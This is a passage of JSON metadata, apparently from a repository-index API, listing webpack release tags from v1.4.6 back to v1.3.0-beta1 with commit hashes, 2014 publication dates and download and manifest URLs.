fests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwe